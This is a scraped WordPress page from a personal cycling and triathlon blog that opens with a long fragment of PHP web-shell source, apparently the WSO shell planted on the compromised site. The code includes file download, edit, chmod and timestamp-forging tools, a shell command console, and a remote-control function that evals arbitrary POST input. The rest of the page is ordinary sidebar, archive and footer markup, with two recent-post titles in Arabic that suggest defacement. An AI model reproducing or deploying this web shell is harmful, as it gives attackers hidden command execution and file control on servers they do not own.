actionFilesTools(){if(isset($_POST[‘p1′])){$_POST[‘p1′]=urldecode($_POST[‘p1′]);}if(@$_POST[‘p2′]==’download’){if(@is_file($_POST[‘p1′])&&@is_readable($_POST[‘p1′])){ob_start(“ob_gzhandler”,4096);header(“Content-Disposition: attachment; filename=”.basename($_POST[‘p1′]));if(function_exists(“mime_content_type”)){$type=@mime_content_type($_POST[‘p1′]);header(“Content-Type: “.$type);}else{header(“Content-Type: application/octet-stream”);}$fp=@fopen($_POST[‘p1′],”r”);if($fp){while(!@feof($fp)){echo @fread($fp,1024);}fclose($fp);}}exit;}if(@$_POST[‘p2′]==’mkfile’){if(!file_exists($_POST[‘p1′])){$fp=@fopen($_POST[‘p1′],’w’);if($fp){$_POST[‘p2′]=”edit”;fclose($fp);}}}wsoHeader();echo ‘<br /> <h1>File tools</h1> <div class=content>‘;if(!file_exists(@$_POST[‘p1′])){echo ‘File not exists';wsoFooter();return;}$uid=@posix_getpwuid(@fileowner($_POST[‘p1′]));if(!$uid){$uid[‘name’]=@fileowner($_POST[‘p1′]);$gid[‘name’]=@filegroup($_POST[‘p1′]);}else{$gid=@posix_getgrgid(@filegroup($_POST[‘p1′]));}echo ‘<span>Name:</span> ‘.htmlspecialchars(@basename($_POST[‘p1′])).’ <span>Size:</span> ‘.(is_file($_POST[‘p1′])?wsoViewSize(filesize($_POST[‘p1′])):’-‘).’ <span>Permission:</span> ‘.wsoPermsColor($_POST[‘p1′]).’ <span>Owner/Group:</span> ‘.$uid[‘name’].’/’.$gid[‘name’].’<br />‘;echo ‘<span>Change time:</span> ‘.date(‘Y-m-d H:i:s’,filectime($_POST[‘p1′])).’ <span>Access time:</span> ‘.date(‘Y-m-d H:i:s’,fileatime($_POST[‘p1′])).’ <span>Modify time:</span> ‘.date(‘Y-m-d H:i:s’,filemtime($_POST[‘p1′])).’</p> <p>‘;if(empty($_POST[‘p2′])){$_POST[‘p2′]=’view';}if(is_file($_POST[‘p1′])){$m = array(‘View’, ‘Highlight’, ‘Download’, ‘Hexdump’, ‘Edit’, ‘Chmod’, ‘Rename’, ‘Touch’);}else{$m = array(‘Chmod’, ‘Rename’, ‘Touch’);}foreach($m as $v){echo ‘<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">‘.((strtolower($v)==@$_POST[‘p2′])?’<b>[ ‘.$v.’ ]</b>‘:$v).’</a> ‘;}echo ‘</p> <p>‘;switch($_POST[‘p2′]){case ‘view':echo ‘ <pre class=ml1>';$fp=@fopen($_POST['p1'],'r');if($fp){while(!@feof($fp)){echo htmlspecialchars(@fread($fp,1024));}@fclose($fp);}echo '</pre> <p>‘;break;case ‘highlight':if( @is_readable($_POST[‘p1′]) ) {echo ‘ <div class=ml1 style="background-color: #e1e1e1;color:black;">‘;$code = @highlight_file($_POST[‘p1′],true);echo str_replace(array(‘<span ','</span>‘), array(‘<font ','</font>‘),$code).’</font></span></div> <p>‘;}break;case ‘chmod':if(!empty($_POST[‘p3′])){$perms=0;for($i=strlen($_POST[‘p3′])-1;$i>=0;–$i){$perms+=(int)$_POST[‘p3′][$i]*pow(8,(strlen($_POST[‘p3′])-$i-1));}if(!@chmod($_POST[‘p1′],$perms)){echo ‘Can\’t set permissions!<br /><script>document.mf.p3.value="";</script>‘;}}clearstatcache();echo ‘<script>p3_="";</script><br /> <form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"/><input type=submit value="/>>”></form> <p>‘;break;case ‘edit':if(!is_writable($_POST[‘p1′])){echo ‘File isn\’t writeable';break;}if(!empty($_POST[‘p3′])){$time=@filemtime($_POST[‘p1′]);$_POST[‘p3′]=substr($_POST[‘p3′],1);$fp=@fopen($_POST[‘p1′],”w”);if($fp) {@fwrite($fp,$_POST[‘p3′]);@fclose($fp);echo ‘Saved!<br /><script>p3_="";</script>‘;@touch($_POST[‘p1′],$time,$time);}}echo ‘<br /> <form onsubmit="g(null,null,\''.urlencode($_POST['p1']).'\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>‘;$fp=@fopen($_POST[‘p1′],’r’);if($fp){while(!@feof($fp))echo htmlspecialchars(@fread($fp,1024));@fclose($fp);}echo ‘</textarea><input type=submit value="/>>”></form> <p>‘;break;case ‘hexdump':$c=@file_get_contents($_POST[‘p1′]);$n=0;$h=array(‘00000000<br />‘,”,”);$len=strlen($c);for($i=0;$i< $len;++$i){$h[1].=sprintf('%02X',ord($c[$i])).' ';switch(ord($c[$i])){case 0:$h[2].=' ';break;case 9:$h[2].=' ';break;case 10:$h[2].=' ';break;case 13:$h[2].=' ';break;default:$h[2].=$c[$i];break;}$n++;if($n==32){$n=0;if($i+1<$len){$h[0].=sprintf('%08X',$i+1).'<br />‘;}$h[1].=’<br />‘;$h[2].=”\n”;}}echo ‘<br /> <table cellspacing=1 cellpadding=5 bgcolor=#222222> <tr> <td bgcolor=#333333><span style="font-weight: normal;"> <pre>'.$h[0].'</pre> <p></span></td> <td bgcolor=#282828> <pre>'.$h[1].'</pre> </td> <td bgcolor=#333333> <pre>'.htmlspecialchars($h[2]).'</pre> </td> </tr> </table> <p>‘;break;case ‘rename':if(!empty($_POST[‘p3′])){if(!@rename($_POST[‘p1′], $_POST[‘p3′])){echo ‘Can\’t rename!<br />‘;}else{die(‘<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>‘);}}echo ‘<br /> <form onsubmit="g(null,null,\''.urlencode($_POST['p1']).'\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"/><input type=submit value="/>>”></form> <p>‘;break;case ‘touch':if(!empty($_POST[‘p3′])){$time=strtotime($_POST[‘p3′]);if($time){if(!touch($_POST[‘p1′],$time,$time)){echo ‘Fail!';}else{echo ‘Touched!';}}else{echo ‘Bad time format!';}}clearstatcache();echo ‘<script>p3_="";</script><br /> <form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"/><input type=submit value="/>>”></form> <p>‘;break;}echo ‘</p></div> <p>‘;wsoFooter();}function actionConsole(){if(!empty($_POST[‘p1′])&&!empty($_POST[‘p2′])){WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’stderr_to_out’,true);$_POST[‘p1′].=’ 2>&1′;}elseif(!empty($_POST[‘p1′])){WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’stderr_to_out’,0);}if(isset($_POST[‘ajax’])){WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’ajax’,true);ob_start();echo “d.cf.cmd.value=”;\n”;$temp=@iconv($_POST[‘charset’],’UTF-8′,addcslashes(“\n$ “.$_POST[‘p1′].”\n”.wsoEx($_POST[‘p1′]),”\n\r\t\\’\0″));if(preg_match(“!.*cd\s+([^;]+)$!”,$_POST[‘p1′],$match)){if(@chdir($match[1])){$GLOBALS[‘cwd’]=@getcwd();echo “c_='”.$GLOBALS[‘cwd’].”‘;”;}}echo “d.cf.output.value+='”.$temp.”‘;”;echo “d.cf.output.scrollTop=d.cf.output.scrollHeight;”;$temp=ob_get_clean();echo strlen($temp),”\n”,$temp;exit;}if(empty($_POST[‘ajax’])&&!empty($_POST[‘p1′])){WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’ajax’,0);}wsoHeader();echo “<script>if(window.Event) window.captureEvents(Event.KEYDOWN);var cmds=new Array('');var cur=0;function kp(e){var n=(window.Event)?e.which:e.keyCode;if(n==38){cur--;if(cur>=0){document.cf.cmd.value=cmds[cur];}else{cur++;} else if(n==40){cur++;if(cur<cmds .length){document.cf.cmd.value=cmds[cur];}else{cur--;}}}function add(cmd){cmds.pop();cmds.push(cmd);cmds.push('');cur=cmds.length-1;}</script>";echo '<br /> <h1>Console</h1> <div class=content> <form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';foreach($GLOBALS['aliases'] as $n=>$v){if($v==''){echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';continue;}echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';}echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="/>>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'/> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'/> redirect stderr to stdout (2>&1)</nobr><br /><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';if(!empty($_POST['p1'])){echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));}echo '</textarea><br /> <table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"> <tr> <td width="1%">$</td> <td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"/></td> </tr> </table> <p>';echo '</p></form> </div> <p><script>d.cf.cmd.focus();</script>';wsoFooter();}function actionRC(){if(!@$_POST['p1']){$a=array("uname"=>php_uname(),"php_version"=>phpversion(),"wso_version"=>WSO_VERSION,"safemode"=>@ini_get('safe_mode'));echo serialize($a);}else{eval($_POST['p1']);}}if(empty($_POST['a'])){if(isset($default_action)&&function_exists('action'.$default_action)){$_POST['a']=$default_action;}else{$_POST['a']='SecInfo';}}if(!empty($_POST['a'])&&function_exists('action'.$_POST['a'])){call_user_func('action'.$_POST['a']);}exit;?></cmds></script></div> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon-text sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-1857" class="share-facebook sd-button share-icon" href="http://blog.irreverence.co.uk/?page_id=1857&share=facebook" target="_blank" title="Share on Facebook"><span>Facebook</span></a></li><li class="share-stumbleupon"><a rel="nofollow" data-shared="" class="share-stumbleupon sd-button share-icon" href="http://blog.irreverence.co.uk/?page_id=1857&share=stumbleupon" target="_blank" title="Click to share on StumbleUpon"><span>StumbleUpon</span></a></li><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-1857" class="share-twitter sd-button share-icon" href="http://blog.irreverence.co.uk/?page_id=1857&share=twitter" target="_blank" title="Click to share on Twitter"><span>Twitter</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-5837271-1857-595477643beff' data-src='//widgets.wp.com/likes/#blog_id=5837271&post_id=1857&origin=blog.irreverence.co.uk&obj_id=5837271-1857-595477643beff' data-name='like-post-frame-5837271-1857-595477643beff'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height:55px'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div> </div><!-- .entry-content --> <footer class="entry-meta"> </footer><!-- .entry-meta --> </article><!-- #post --> <div id="comments" class="comments-area"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/?page_id=1857#respond" style="display:none;">Cancel reply</a></small></h3> <div id="commentform" class="comment-form"> <iframe src="http://jetpack.wordpress.com/jetpack-comment/?blogid=5837271&postid=1857&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en-US&jetpack_version=3.5.3&sig=8b4cc1c2197ecd1762ba094a7058217dbbf9c87d#parent=http%3A%2F%2Fblog.irreverence.co.uk%2F%3Fpage_id%3D1857" allowtransparency="false" style="width:100%; height: 430px;border:0px;" frameBorder="0" scrolling="no" name="jetpack_remote_comment" id="jetpack_remote_comment"></iframe> </div> </div> <input type="hidden" name="comment_parent" id="comment_parent" value="" /> </div><!-- #comments --> </div><!-- #content --> </div><!-- #primary --> <div id="tertiary" class="sidebar-container" role="complementary"> <div class="sidebar-inner"> <div class="widget-area"> <aside id="recent-posts-2" class="widget widget_recent_entries"> <h3 class="widget-title">Recent Posts</h3> <ul> <li> <a href="http://blog.irreverence.co.uk/?p=1862">اشهد ان لا اله الا الله</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1860">احا احا ورد بريس دا احا احا خخخخخخ</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1850">Lots to Learn</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1848">Injuries: Cav + Froomey = me</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1845">One inch can make all the difference</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1840">V Brake Adjustments</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1838">ITV HD on Sky in Scotland</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1836">Cycling and a sore bum</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1831">Cycling in a Group Ride</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1828">Fixing a rattling stem</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1824">Stretching while swimming</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1822">Shoulder not happy after swim</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1818">Groupset upgrade, piece by piece</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1815">Rear Mech Hanger Snapped</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1813">First triathlon</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1808">Sky breaks Never Miss feature on their web site</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1798">Shimano Tiagra Groupset is Installed</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1796">Office 365 is broken: Sorry, there’s something wrong with your account</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1793">Castelli Gabba Windstopper Rain Jersey</a> </li> <li> <a href="http://blog.irreverence.co.uk/?p=1789">Swimming just got easier</a> </li> </ul> </aside><aside id="categories-1" class="widget widget_categories"><h3 class="widget-title">Categories</h3><label class="screen-reader-text" for="cat">Categories</label><select name='cat' id='cat' class='postform' > <option value='-1'>Select Category</option> <option class="level-0" value="186">Cervélo</option> <option class="level-0" value="182">Contour+</option> <option class="level-0" value="187">Crash March 2013</option> <option class="level-0" value="181">Cycling</option> <option class="level-0" value="180">DogCam Bullet HD Wide</option> <option class="level-0" value="184">Draw Something</option> <option class="level-0" value="11">Driving</option> <option class="level-0" value="185">Edge 800</option> <option class="level-0" value="2">Family</option> <option class="level-0" value="113">Films</option> <option class="level-0" value="177">Forerunner 405</option> <option class="level-0" value="178">Forerunner 910xt</option> <option class="level-0" value="176">Garmin</option> <option class="level-0" value="183">Headcams</option> <option class="level-0" value="1">Health</option> <option class="level-0" value="7">I.T.</option> <option class="level-0" value="12">Multiple Sclerosis</option> <option class="level-0" value="179">multiple-garmin-activities</option> <option class="level-0" value="174">Music</option> <option class="level-0" value="14">News</option> <option class="level-0" value="5">Play</option> <option class="level-0" value="6">Religion</option> <option class="level-0" value="4">Rest</option> <option class="level-0" value="13">Running</option> <option class="level-0" value="10">Sexism</option> <option class="level-0" value="175">Swimming</option> <option class="level-0" value="9">Tennis</option> <option class="level-0" value="188">Triathlon</option> <option class="level-0" value="3">Work</option> </select> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "cat" ); function onCatChange() { if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) { location.href = "http://blog.irreverence.co.uk/?cat=" + dropdown.options[ dropdown.selectedIndex ].value; } } dropdown.onchange = onCatChange; })(); /* ]]> */ </script> </aside><aside id="text-1" class="widget widget_text"><h3 class="widget-title">About</h3> <div class="textwidget"><a href="http://blog.irreverence.co.uk/?page_id=418">The Irreverent Blogger</a></div> </aside><aside id="meta-2" class="widget widget_meta"><h3 class="widget-title">Meta</h3> <ul> <li><a href="http://blog.irreverence.co.uk/wp-login.php">Log in</a></li> <li><a href="http://blog.irreverence.co.uk/?feed=rss2">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="http://blog.irreverence.co.uk/?feed=comments-rss2">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://wordpress.org/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a></li> </ul> </aside><aside id="archives-2" class="widget widget_archive"><h3 class="widget-title">Archives</h3> <label class="screen-reader-text" for="archives-dropdown-2">Archives</label> <select id="archives-dropdown-2" name="archive-dropdown" onchange='document.location.href=this.options[this.selectedIndex].value;'> <option value="">Select Month</option> <option value='http://blog.irreverence.co.uk/?m=201706'> June 2017 </option> <option value='http://blog.irreverence.co.uk/?m=201407'> July 2014 </option> <option value='http://blog.irreverence.co.uk/?m=201406'> June 2014 </option> <option value='http://blog.irreverence.co.uk/?m=201405'> May 2014 </option> <option value='http://blog.irreverence.co.uk/?m=201404'> April 2014 </option> <option value='http://blog.irreverence.co.uk/?m=201403'> March 2014 </option> <option value='http://blog.irreverence.co.uk/?m=201402'> February 2014 </option> <option value='http://blog.irreverence.co.uk/?m=201401'> January 2014 </option> <option value='http://blog.irreverence.co.uk/?m=201312'> December 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201311'> November 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201310'> October 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201309'> September 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201308'> August 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201307'> July 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201306'> June 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201305'> May 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201304'> April 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201303'> March 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201302'> February 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201301'> January 2013 </option> <option value='http://blog.irreverence.co.uk/?m=201212'> December 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201211'> November 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201210'> October 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201209'> September 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201208'> August 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201207'> July 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201206'> June 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201205'> May 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201204'> April 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201203'> March 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201202'> February 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201201'> January 2012 </option> <option value='http://blog.irreverence.co.uk/?m=201112'> December 2011 </option> <option value='http://blog.irreverence.co.uk/?m=201111'> November 2011 </option> <option value='http://blog.irreverence.co.uk/?m=201110'> October 2011 </option> <option value='http://blog.irreverence.co.uk/?m=201108'> August 2011 </option> <option value='http://blog.irreverence.co.uk/?m=201107'> July 2011 </option> <option value='http://blog.irreverence.co.uk/?m=201106'> June 2011 </option> <option value='http://blog.irreverence.co.uk/?m=201105'> May 2011 </option> <option value='http://blog.irreverence.co.uk/?m=201010'> October 2010 </option> <option value='http://blog.irreverence.co.uk/?m=201009'> September 2010 </option> <option value='http://blog.irreverence.co.uk/?m=201006'> June 2010 </option> <option value='http://blog.irreverence.co.uk/?m=201005'> May 2010 </option> <option value='http://blog.irreverence.co.uk/?m=201004'> April 2010 </option> <option value='http://blog.irreverence.co.uk/?m=201003'> March 2010 </option> <option value='http://blog.irreverence.co.uk/?m=200912'> December 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200909'> September 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200908'> August 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200906'> June 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200905'> May 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200904'> April 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200903'> March 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200902'> February 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200901'> January 2009 </option> <option value='http://blog.irreverence.co.uk/?m=200812'> December 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200811'> November 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200810'> October 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200809'> September 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200808'> August 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200807'> July 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200806'> June 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200805'> May 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200804'> April 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200803'> March 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200802'> February 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200801'> January 2008 </option> <option value='http://blog.irreverence.co.uk/?m=200712'> December 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200711'> November 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200710'> October 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200709'> September 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200708'> August 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200707'> July 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200706'> June 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200705'> May 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200704'> April 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200703'> March 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200702'> February 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200701'> January 2007 </option> <option value='http://blog.irreverence.co.uk/?m=200612'> December 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200611'> November 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200610'> October 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200609'> September 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200608'> August 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200607'> July 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200606'> June 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200605'> May 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200604'> April 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200603'> March 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200602'> February 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200601'> January 2006 </option> <option value='http://blog.irreverence.co.uk/?m=200511'> November 2005 </option> <option value='http://blog.irreverence.co.uk/?m=200510'> October 2005 </option> <option value='http://blog.irreverence.co.uk/?m=200509'> September 2005 </option> <option value='http://blog.irreverence.co.uk/?m=200508'> August 2005 </option> <option value='http://blog.irreverence.co.uk/?m=200507'> July 2005 </option> <option value='http://blog.irreverence.co.uk/?m=200506'> June 2005 </option> <option value='http://blog.irreverence.co.uk/?m=200502'> February 2005 </option> </select> </aside><aside id="linkcat-8" class="widget widget_links"><h3 class="widget-title">Blogroll</h3> <ul class='xoxo blogroll'> <li><a href="http://www.rosshendry.com/">font { size: red; }</a></li> <li><a href="http://wonlife.wordpress.com/" title="living large with multiple sclerosis">One Life</a></li> <li><a href="http://runthomasrun.wordpress.com/">Run Thomas! Run!</a></li> </ul> </aside> <aside id="calendar-2" class="widget widget_calendar"><div id="calendar_wrap"><table id="wp-calendar"> <caption>June 2017</caption> <thead> <tr> <th scope="col" title="Monday">M</th> <th scope="col" title="Tuesday">T</th> <th scope="col" title="Wednesday">W</th> <th scope="col" title="Thursday">T</th> <th scope="col" title="Friday">F</th> <th scope="col" title="Saturday">S</th> <th scope="col" title="Sunday">S</th> </tr> </thead> <tfoot> <tr> <td colspan="3" id="prev"><a href="http://blog.irreverence.co.uk/?m=201407">« Jul</a></td> <td class="pad"> </td> <td colspan="3" id="next" class="pad"> </td> </tr> </tfoot> <tbody> <tr> <td colspan="3" class="pad"> </td><td>1</td><td>2</td><td>3</td><td>4</td> </tr> <tr> <td>5</td><td>6</td><td>7</td><td>8</td><td>9</td><td><a href="http://blog.irreverence.co.uk/?m=20170610" title="احا احا ورد بريس دا احا احا خخخخخخ, اشهد ان لا اله الا الله">10</a></td><td>11</td> </tr> <tr> <td>12</td><td>13</td><td>14</td><td>15</td><td>16</td><td>17</td><td>18</td> </tr> <tr> <td>19</td><td>20</td><td>21</td><td>22</td><td>23</td><td>24</td><td>25</td> </tr> <tr> <td>26</td><td>27</td><td>28</td><td id="today">29</td><td>30</td> <td class="pad" colspan="2"> </td> </tr> </tbody> </table></div></aside> </div><!-- .widget-area --> </div><!-- .sidebar-inner --> </div><!-- #tertiary --> </div><!-- #main --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="site-info"> <a href="http://wordpress.org/" title="Semantic Personal Publishing Platform">Proudly powered by WordPress</a> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <div style="display:none"> </div> <script type="text/javascript"> window.WPCOM_sharing_counts = {"http:\/\/blog.irreverence.co.uk\/?page_id=1857":1857}; window.WPCOM_jetpack = true; </script> <script type="text/javascript"> var windowOpen; jQuery(document).on( 'ready post-load', function(){ jQuery( 'a.share-facebook' ).on( 'click', function() { if ( 'undefined' !== typeof windowOpen ){ // If there's another sharing window open, close it. windowOpen.close(); } windowOpen = window.open( jQuery(this).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' ); return false; }); }); </script> <script type="text/javascript"> var windowOpen; jQuery(document).on( 'ready post-load', function(){ jQuery( 'a.share-twitter' ).on( 'click', function() { if ( 'undefined' !== typeof windowOpen ){ // If there's another sharing window open, close it. windowOpen.close(); } windowOpen = window.open( jQuery(this).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' ); return false; }); }); </script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/plugins/akismet/_inc/form.js?ver=3.1.5'></script> <script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201726'></script> <script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Junaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.2.12'></script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/themes/twentythirteen/js/functions.js?ver=2013-07-18'></script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.5.3'></script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.5.3'></script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.5.3'></script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/plugins/jetpack/modules/likes/queuehandler.js?ver=3.5.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var sharing_js_options = {"lang":"en","counts":"1"}; /* ]]> */ </script> <script type='text/javascript' src='http://blog.irreverence.co.uk/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=3.5.3'></script> <iframe src='http://widgets.wp.com/likes/master.html?ver=20141028#ver=20141028&mp6=1' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe> <div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> bloggers like this:</div><ul class="wpl-avatars sd-like-gravatars"></ul></div> <!--[if IE]> <script type="text/javascript"> if ( 0 === window.location.hash.indexOf( '#comment-' ) ) { // window.location.reload() doesn't respect the Hash in IE window.location.hash = window.location.hash; } </script> <![endif]--> <script type="text/javascript"> var comm_par_el = document.getElementById( 'comment_parent' ), comm_par = (comm_par_el && comm_par_el.value) ? comm_par_el.value : '', frame = document.getElementById( 'jetpack_remote_comment' ), tellFrameNewParent; tellFrameNewParent = function() { if ( comm_par ) { frame.src = "http://jetpack.wordpress.com/jetpack-comment/?blogid=5837271&postid=1857&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en-US&jetpack_version=3.5.3&sig=8b4cc1c2197ecd1762ba094a7058217dbbf9c87d#parent=http%3A%2F%2Fblog.irreverence.co.uk%2F%3Fpage_id%3D1857" + '&replytocom=' + parseInt( comm_par, 10 ).toString(); } else { frame.src = 